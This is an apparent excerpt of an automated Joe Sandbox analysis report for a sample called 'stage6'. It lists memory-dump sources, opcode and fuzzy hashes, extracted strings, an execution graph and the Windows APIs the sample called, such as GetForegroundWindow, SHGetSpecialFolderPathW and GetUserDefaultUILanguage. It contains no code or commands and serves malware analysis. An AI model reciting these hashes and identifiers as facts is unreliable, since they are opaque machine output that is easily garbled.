                                                                                              • Instruction Fuzzy Hash: 74C1A534E0020ACFDB19EFA9D8946EDBBB2FB49301F108129D5166B394DB355986CF50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1144460887.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_16b0000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'q
                                                                                              • API String ID: 0-1807707664
                                                                                              • Opcode ID: b9639caf187a73d3ae9152b7298e684b4c1313f905290d0a2d3d0c795f8fb90b
                                                                                              • Instruction ID: 07a8221e1308393b7560ff97609290d492591c18f053ad3666a6fd3c03e53e12
                                                                                              • Opcode Fuzzy Hash: b9639caf187a73d3ae9152b7298e684b4c1313f905290d0a2d3d0c795f8fb90b
                                                                                              • Instruction Fuzzy Hash: 48311C75E04349CFDB0ADFAAC9942EDBBB2BF85300F14806AC155AB391EB344986CF51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 1
                                                                                              • API String ID: 0-2212294583
                                                                                              • Opcode ID: 8c59e162a3d0c1eb1b2f11893f75d0d75877bc3351c6bba76a459b938e1a4b23
                                                                                              • Instruction ID: 1d8b68c3030c2619fcf9196294a3f9c7f79bf62d40c5e7a09a5da61f388f9bef
                                                                                              • Opcode Fuzzy Hash: 8c59e162a3d0c1eb1b2f11893f75d0d75877bc3351c6bba76a459b938e1a4b23
                                                                                              • Instruction Fuzzy Hash: 7D311D78A15219CFCBA5DF18C898A99B7B1FB48340F1051E9E91DA7394CB346EC1CF51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 1
                                                                                              • API String ID: 0-2212294583
                                                                                              • Opcode ID: 2b1b388728e8d7483e36d55f06a5e104739bce15d8f9e2739ea56181521a5817
                                                                                              • Instruction ID: 354079fd6c32ab321cec7ea2738b9279ee201e71bd819f80cd819f65405c99c0
                                                                                              • Opcode Fuzzy Hash: 2b1b388728e8d7483e36d55f06a5e104739bce15d8f9e2739ea56181521a5817
                                                                                              • Instruction Fuzzy Hash: 07211D78915229CFCBA5DF24C898AA9B7B2FB48340F1040E9E50DA7384CB306EC1CF51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $
                                                                                              • API String ID: 0-3993045852
                                                                                              • Opcode ID: 2b856781b9b973e29d9ae1057c928da0cf4fa1df2eb8d9c8275206dc6cc762d7
                                                                                              • Instruction ID: dd9c3c67034dbe6a5d4c7b356e8d201aabd3b5bd7efb2de8c38edfab19b5b0cf
                                                                                              • Opcode Fuzzy Hash: 2b856781b9b973e29d9ae1057c928da0cf4fa1df2eb8d9c8275206dc6cc762d7
                                                                                              • Instruction Fuzzy Hash: 2D111438A10219CFDB60EF28D888BDAB7B2EB48304F0040D9A519A7390CB349EC58F90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e7c5a6c78df553c53129b73c5457b6f8ac1480546941694d03d74f2f631eddc0
                                                                                              • Instruction ID: e3e16b60b8fb86eb43b6d65c710775b73e98ed38290c213209efac7c711f6864
                                                                                              • Opcode Fuzzy Hash: e7c5a6c78df553c53129b73c5457b6f8ac1480546941694d03d74f2f631eddc0
                                                                                              • Instruction Fuzzy Hash: 6831A578A017688FDBA5CF28C894E99BBB6FB48301F1041D9E809A7355DB34AEC5CF40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f0a0a3deb3410229cfb4bf045b02757916fccf2658a3a9330d49e56064614eef
                                                                                              • Instruction ID: 1379047aec5107f294f5edae26bd6f6706fc3f3eb5d3619044731690c626ae91
                                                                                              • Opcode Fuzzy Hash: f0a0a3deb3410229cfb4bf045b02757916fccf2658a3a9330d49e56064614eef
                                                                                              • Instruction Fuzzy Hash: 18114F34D5422ACFDBA0DF58C898BEAB7B2FB04344F1150E9E519A7281CB744EC48F92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2abf91956a45506ccc1bde333c2e82b01691a08a54dd090d44078ecf9166dadf
                                                                                              • Instruction ID: 033facd81e3786b63f5ba332719b71768d2699356cf4ce095bd1cebef0bf1ed2
                                                                                              • Opcode Fuzzy Hash: 2abf91956a45506ccc1bde333c2e82b01691a08a54dd090d44078ecf9166dadf
                                                                                              • Instruction Fuzzy Hash: CD112A78E102188FCB65DF24D8846D9B7B2FB4C341F1050E9A60DA3340D7345EC28F50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 50ab34e5009dffd4f38309209daa28236581e69d0daa54be42c216212f356d2a
                                                                                              • Instruction ID: cc1624ad26e5e6d496c5f42fab8b79a4aecb51fe484956dac37a862c51e904f8
                                                                                              • Opcode Fuzzy Hash: 50ab34e5009dffd4f38309209daa28236581e69d0daa54be42c216212f356d2a
                                                                                              • Instruction Fuzzy Hash: BBE0A574D04208EFDB94DFA8D9446ACBBF4EB48300F10C1AA9C1893341D635AA51DB95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 50ab34e5009dffd4f38309209daa28236581e69d0daa54be42c216212f356d2a
                                                                                              • Instruction ID: 872d8932b867964268702ff0b187346327638c8f71aec8f3a186c8c6fd755330
                                                                                              • Opcode Fuzzy Hash: 50ab34e5009dffd4f38309209daa28236581e69d0daa54be42c216212f356d2a
                                                                                              • Instruction Fuzzy Hash: BBE0C974D04208EFDB94DFA8D944AACBBF4EB48310F10C1AA980893381D7759A51DF94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 50ab34e5009dffd4f38309209daa28236581e69d0daa54be42c216212f356d2a
                                                                                              • Instruction ID: 9b548f7875d902695a91d8f6c5ae801e508ce9e2952a98dcf1f2a76d1cc08033
                                                                                              • Opcode Fuzzy Hash: 50ab34e5009dffd4f38309209daa28236581e69d0daa54be42c216212f356d2a
                                                                                              • Instruction Fuzzy Hash: 9BE0C974D05208EFEB94DFA8DA446ADBBF5EB48310F10C1AA9C0893340D7359A51DF94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fc38897e5d495457ac4331ee73022279ddecbaac3a6dcb81aca2e41a3edbef9f
                                                                                              • Instruction ID: e12bbca4cd99a44cd6ba35e482ebb18e52c2f279d2df3c091ceb03bccfb1b5cf
                                                                                              • Opcode Fuzzy Hash: fc38897e5d495457ac4331ee73022279ddecbaac3a6dcb81aca2e41a3edbef9f
                                                                                              • Instruction Fuzzy Hash: 4AE0DF74808208EBD714EF94D800AACBBB8AB45304F24C0A9DC0853380C6319A41DBA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b1340d004725a0fe054d302ef3d63f4859d462306675875d6cc754cdcb1477b0
                                                                                              • Instruction ID: ce3d5562c4213d794ab0f6ecc167458947667f9eb89dad1e86db2892b933521c
                                                                                              • Opcode Fuzzy Hash: b1340d004725a0fe054d302ef3d63f4859d462306675875d6cc754cdcb1477b0
                                                                                              • Instruction Fuzzy Hash: 50E01234D08208EFDB54DBA8D9406ACBBF8EB89204F14C1AAC81857382D7359A82DB95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 456446838864aa8faf807e5a97716ef8f67a598250bbb09decd56ca59ee97348
                                                                                              • Instruction ID: eb7dfd3f073f427f845dcec8303fe25ce9ab64561064e6aaa42f38a53e20f620
                                                                                              • Opcode Fuzzy Hash: 456446838864aa8faf807e5a97716ef8f67a598250bbb09decd56ca59ee97348
                                                                                              • Instruction Fuzzy Hash: 19E01234D08208EBDB54DFD4D9455ACBBB8EF45304F14D1ADD81827385C7316E52DB95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a5461baa469397d30b6cd30f90cd7e11265adb5880d9861cfd8671412adc77e8
                                                                                              • Instruction ID: 0d87071dee3678c45b98cc3d13b13cfa2986bf467612d7ea4d707fa99f52c4b3
                                                                                              • Opcode Fuzzy Hash: a5461baa469397d30b6cd30f90cd7e11265adb5880d9861cfd8671412adc77e8
                                                                                              • Instruction Fuzzy Hash: 28E0EC71941208FBDB14EBB4D904A9E77E8EB05240F0045E6D50893150EA715A14EBA6

                                                                                              Non-executed Functions

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4ea361767d81326988703d5556d2d756de569bc0975190a28a4706ae73c97838
                                                                                              • Instruction ID: 84b7273e7b4ce34e328277fb2db55b9874a01a122886e12847c741d4f55bcea6
                                                                                              • Opcode Fuzzy Hash: 4ea361767d81326988703d5556d2d756de569bc0975190a28a4706ae73c97838
                                                                                              • Instruction Fuzzy Hash: 5D912870D05218CFFB64DFA9D884BADBBF6BF49300F1084AAD419A7281DB745985CF61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3f10816ffe418d837f2f613e9a3b2b270acf1f1390d566bd344c64037d5533c2
                                                                                              • Instruction ID: d7a9163c9e9625428e21f67c7ff59fc07a2a01cc950c007b26d66ed8dad04214
                                                                                              • Opcode Fuzzy Hash: 3f10816ffe418d837f2f613e9a3b2b270acf1f1390d566bd344c64037d5533c2
                                                                                              • Instruction Fuzzy Hash: 39315E71D097558FEB69CF6A8C54299BBF7BF85300F04C0FAD508A6256DB740A85CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 087de318a5a1d7a16491882523071a3fcbd3c7734a752d5faa9bea54c1daaa25
                                                                                              • Instruction ID: e25b2593a90dc1f4bebc1b95fce981c6b8d0bb8ce8c0620403a84df561c25f09
                                                                                              • Opcode Fuzzy Hash: 087de318a5a1d7a16491882523071a3fcbd3c7734a752d5faa9bea54c1daaa25
                                                                                              • Instruction Fuzzy Hash: 2321E9B1E04619CBEB68CF5BC854299FAF7BFC8300F14D0BAD50CA6254DB740A958F50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: #$$$'$\sq
                                                                                              • API String ID: 0-2157715064
                                                                                              • Opcode ID: a0705cd370dac82d1485b961d73c32546dd97751b5f55cd9e4c4401b341b0e00
                                                                                              • Instruction ID: c417bd8caa2d232163d8ce55506a0743d4b6324a3f2078d60c1ba321677c726b
                                                                                              • Opcode Fuzzy Hash: a0705cd370dac82d1485b961d73c32546dd97751b5f55cd9e4c4401b341b0e00
                                                                                              • Instruction Fuzzy Hash: 8B310774D00228DFEB64CFA5D844BEDB7F6FB89300F0085AAD519A3281DB744A85CFA0

                                                                                              Execution Graph

                                                                                              Execution Coverage

                                                                                              Dynamic/Packed Code Coverage

                                                                                              Signature Coverage

                                                                                              Execution Coverage:2.1%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:15.1%
                                                                                              Total number of Nodes:73
                                                                                              Total number of Limit Nodes:7
                                                                                              Show Legend
                                                                                              Hide Nodes/Edges
                                                                                              execution_graph 13457 408850 13459 40885f 13457->13459 13458 408acf ExitProcess 13459->13458 13460 408ab8 13459->13460 13461 40891c GetCurrentProcessId GetCurrentThreadId 13459->13461 13470 43c160 13460->13470 13462 408941 13461->13462 13463 408945 SHGetSpecialFolderPathW GetForegroundWindow 13461->13463 13462->13463 13465 408a3d 13463->13465 13465->13460 13469 40c550 CoInitializeEx 13465->13469 13473 43d7f0 13470->13473 13472 43c165 FreeLibrary 13472->13458 13474 43d7f9 13473->13474 13474->13472 13475 435972 13476 43599b 13475->13476 13478 4359c4 13476->13478 13479 43c1f0 LdrInitializeThunk 13476->13479 13479->13476 13480 43e7d0 13482 43e800 13480->13482 13481 43e87f 13483 43e94e 13481->13483 13487 43c1f0 LdrInitializeThunk 13481->13487 13482->13481 13486 43c1f0 LdrInitializeThunk 13482->13486 13486->13481 13487->13483 13429 43c767 13430 43c790 13429->13430 13430->13430 13431 43c80e 13430->13431 13433 43c1f0 LdrInitializeThunk 13430->13433 13433->13431 13434 43cce6 13435 43cd00 13434->13435 13437 43cd6e 13435->13437 13441 43c1f0 LdrInitializeThunk 13435->13441 13440 43c1f0 LdrInitializeThunk 13437->13440 13439 43ce4d 13440->13439 13441->13437 13442 436145 13446 43dbf0 13442->13446 13444 43615d GetUserDefaultUILanguage 13445 436188 13444->13445 13447 43c58a 13448 43c460 13447->13448 13448->13448 13449 43c5f4 13448->13449 13452 43c1f0 LdrInitializeThunk 13448->13452 13451 43c54d 13452->13451 13488 43cb19 13490 43cb40 13488->13490 13489 43cbae 13490->13489 13492 43c1f0 LdrInitializeThunk 13490->13492 13492->13489 13453 43c2c8 13454 43c2e0 GetForegroundWindow 13453->13454 13456 43ccbe 13454->13456 13493 40a03d 13494 40a130 13493->13494 13497 40acf0 13494->13497 13496 40a17f 13498 40ad80 13497->13498 13500 40ada5 13498->13500 13501 43c180 13498->13501 13500->13496 13502 43c1d0 13501->13502 13503 43c1a6 13501->13503 13504 43c1ba 13501->13504 13505 43c198 13501->13505 13509 43c1c0 13501->13509 13510 43c1d6 13501->13510 13516 43aaa0 13502->13516 13512 43c1ab RtlReAllocateHeap 13503->13512 13513 43aa80 13504->13513 13505->13502 13505->13503 13505->13509 13505->13510 13507 43aaa0 RtlFreeHeap 13511 43c1df 13507->13511 13509->13498 13510->13507 13512->13509 13520 43d810 13513->13520 13515 43aa8a RtlAllocateHeap 13515->13509 13517 43aab3 13516->13517 13518 43aac4 13516->13518 13519 43aab8 RtlFreeHeap 13517->13519 13518->13510 13519->13518 13521 43d830 13520->13521 13521->13515 13521->13521

                                                                                              Executed Functions

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 0040891C
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00408925
                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089DB
                                                                                              • GetForegroundWindow.USER32 ref: 00408A33
                                                                                                • Part of subcall function 0040C550: CoInitializeEx.OLE32(00000000,00000002), ref: 0040C563
                                                                                                • Part of subcall function 0040B390: FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
                                                                                                • Part of subcall function 0040B390: FreeLibrary.KERNEL32 ref: 0040B3B7
                                                                                              • ExitProcess.KERNEL32 ref: 00408AD1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3072701918-0
                                                                                              • Opcode ID: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
                                                                                              • Instruction ID: 4e8ceca9db94e69365d2c2d7f1aefafb9de861df3649afd20bfce81a3928f3be
                                                                                              • Opcode Fuzzy Hash: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
                                                                                              • Instruction Fuzzy Hash: 9351A9BBF102180BD71CAEAACD463A675878BC5710F1F813E5985EB7D6EDB88C0142C9

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 134 43c1f0-43c222 LdrInitializeThunk
                                                                                              APIs
                                                                                              • LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ,+*)
                                                                                              • API String ID: 0-3529585375
                                                                                              • Opcode ID: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
                                                                                              • Instruction ID: 95b520c28a51d7a8debe208fb8c6725e065a55489a7142fefcc330b3f2274472
                                                                                              • Opcode Fuzzy Hash: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
                                                                                              • Instruction Fuzzy Hash: 7331A539B402119BEB18CF58CCD1BBEB7B2BB49301F249129D501B7390CB75AD018B58
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: o`
                                                                                              • API String ID: 0-3993896143
                                                                                              • Opcode ID: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                                                                              • Instruction ID: 0bdba0f6bf2b5cd18ae264ba298f37260da84434396a298b3053f459174327b1
                                                                                              • Opcode Fuzzy Hash: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                                                                              • Instruction Fuzzy Hash: 9C11C270218340AFC310DF65DDC1B6BBFE2DBC2204F65983DE185A72A1C675E9499719

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 105 436145-436186 call 43dbf0 GetUserDefaultUILanguage 108 436188-43618b 105->108 109 4361cd-4361f8 108->109 110 43618d-4361cb 108->110 110->108
                                                                                              APIs
                                                                                              • GetUserDefaultUILanguage.KERNELBASE ref: 00436165
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID: DefaultLanguageUser
                                                                                              • String ID:
                                                                                              • API String ID: 95929093-0
                                                                                              • Opcode ID: c20870ad1c2550df031d9ae96be031c5a683c54f8c490753efcc1857bb42eeb8
                                                                                              • Instruction ID: 741c48333e69648009e785c6466c575ff7d71c05fd411e4f0ced63eefbf4b49a
                                                                                              • Opcode Fuzzy Hash: c20870ad1c2550df031d9ae96be031c5a683c54f8c490753efcc1857bb42eeb8
                                                                                              • Instruction Fuzzy Hash: 86115B32D052968FDB14CB3C8C502ADBFB15F8A320F1983EDD8A5A33D5D9304E428B51

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 111 43c2c8-43c2d6 112 43c2e0-43c2fd 111->112 112->112 113 43c2ff-43ccb9 GetForegroundWindow call 43e110 112->113 116 43ccbe-43ccdf 113->116
                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32 ref: 0043CCAF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID: ForegroundWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2020703349-0
                                                                                              • Opcode ID: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                                                                              • Instruction ID: 8fb46afbfb550afb85baefcd5c24b2e1a72551ea741637eac68a3138d718cba2
                                                                                              • Opcode Fuzzy Hash: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                                                                              • Instruction Fuzzy Hash: 07F04CBAD005408BDB044B75CC821A67BA2DB5F320B18897DD441E3384C63C5807CB5D

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 117 43c180-43c191 118 43c1d0-43c1d6 call 43aaa0 117->118 119 43c1a6-43c1b8 call 43d810 RtlReAllocateHeap 117->119 120 43c1c5 117->120 121 43c1cb 117->121 122 43c1ba-43c1bb call 43aa80 117->122 123 43c1d9-43c1df call 43aaa0 117->123 124 43c198-43c19f 117->124 118->123 129 43c1cd-43c1cf 119->129 120->121 121->129 133 43c1c0-43c1c3 122->133 124->118 124->119 124->120 124->121 124->123 133->129
                                                                                              APIs
                                                                                              • RtlReAllocateHeap.NTDLL(?,00000000,?,00000000,?,?,0040B2E4,00000000,00000001), ref: 0043C1B2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: d479befdbac128fe149772a9185de956813756a2e3e272a70dac7c9e8d919251
                                                                                              • Instruction ID: ec0cbf63999808cd9fde2cf832404b9ab0848eb4eaaead86bc709d6aa026588d
                                                                                              • Opcode Fuzzy Hash: d479befdbac128fe149772a9185de956813756a2e3e272a70dac7c9e8d919251
                                                                                              • Instruction Fuzzy Hash: 59F0E977808211EBD2003F257C01A5736649F8F735F01587AFC0152112D739D422E6AF

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 135 43aaa0-43aaac 136 43aab3-43aabe call 43d810 RtlFreeHeap 135->136 137 43aac4-43aac5 135->137 136->137
                                                                                              APIs
                                                                                              • RtlFreeHeap.NTDLL(?,00000000,?,0043C1D6,?,0040B2E4,00000000,00000001), ref: 0043AABE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_stage6.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeHeap
                                                                                              • String ID:
                                                                                              • API String ID: 3298025750-0
                                                                                              • Opcode ID: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
                                                                                              • Instruction ID: 16971ee2c2e030bf17817a0d81dc477e65560ccac1e7abaabcdfe7fdc6775186
                                                                                              • Opcode Fuzzy Hash: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
                                                                                              • Instruction Fuzzy Hash: B2D01231505522EBC6102F25FC06B863A58EF0E761F0748B1B4006B071C765ECA186D8

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 140 43aa80-43aa97 call 43d810 RtlAllocateHeap
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(?,00000000,?,?,0043C1C0), ref: 0043AA90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
